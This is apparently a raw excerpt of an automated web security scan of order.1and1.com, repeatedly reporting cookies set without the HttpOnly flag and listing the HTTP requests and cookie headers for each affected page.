GET /xml/order/Mail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=16f7de2564d56000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailInstantMail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=786f94fc96f1d800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailXchange HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3ab11e06d79b6c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MicrosoftExchange HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Moneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=62ccfd6dea1ab800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Moneyback HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1bedc423003cf400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=56a1c9b59ccfc800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Mshosting HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=3c94c49b88c62400; UT=pbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0jKVliKBszLy4zMC0wMSstKCk=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:12:AAABLtRYsR8sOtfROdrX6nNd8dbBxzhJ:1300642705695; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=1077e08166155000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/News HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3cad72d7db6a8800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/PrivacyPolicy HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.privacypolicy HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=66655d0aa462b000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Server HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
